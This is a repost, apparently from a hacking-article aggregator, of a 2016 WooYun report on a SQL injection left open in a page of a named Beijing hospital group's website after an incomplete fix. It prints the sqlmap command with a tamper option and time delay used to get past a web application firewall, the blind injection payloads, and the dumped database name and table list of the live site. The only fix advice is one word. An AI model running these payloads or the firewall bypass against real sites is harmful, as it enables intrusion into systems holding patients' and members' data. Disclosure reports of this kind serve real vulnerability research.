记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

和睦家某站修复不当继续SQL注入

2016-01-05 13:00

URL:http://life.ufh.com.cn/guidelist.php?g_id=10

之前提过一个 和睦家回复说已修复此漏洞

厂商回复:

医院官方主页,篡改后会对影响医院声誉

最新状态:

2015-12-21:供应商已修复此漏洞

WooYun: 和睦家医院某站sql注入

测试发现,应该就是加了个软waf 加个延时可以继续注入

C:\Python27\SqlMap>Sqlmap.py -u http://life.ufh.com.cn/guidelist.php?g_id=10 --t

ime-sec=20 --tamper=space2comment



sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:

---

Parameter: g_id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: g_id=10 AND 8003=8003



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)

---

back-end DBMS: MySQL 5.0.12

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: g_id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: g_id=10 AND 8003=8003



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)

---

back-end DBMS: MySQL 5.0.12

current database: 'life_wp'

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: g_id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: g_id=10 AND 8003=8003



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: g_id=10 AND (SELECT * FROM (SELECT(SLEEP(20)))CzTv)

---

back-end DBMS: MySQL 5.0.12

Database: life_wp

[28 tables]

+-----------------------+

| wp_activity |

| wp_apphos |

| wp_apply |

| wp_channel |

| wp_commentmeta |

| wp_comments |

| wp_forgetpwd |

| wp_guide |

| wp_home |

| wp_hospital |

| wp_links |

| wp_member |

| wp_options |

| wp_order |

| wp_pack |

| wp_pactivity |

| wp_personnel |

| wp_postmeta |

| wp_posts |

| wp_prize |

| wp_sign |

| wp_term_relationships |

| wp_term_taxonomy |

| wp_terms |

| wp_usermeta |

| wp_users |

| wp_wechat |

| wp_winning |

+-----------------------+

漏洞证明:

RT

修复方案:

过滤啊


知识来源: www.wooyun.org/bugs/wooyun-2016-0163866

阅读:403340 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“和睦家某站修复不当继续SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

客黑业创的万千入年:由自富财

❤用费0款退球星,年1期效有员会

🧠富财控掌,知认升提,长成起一💡

标签云 ☁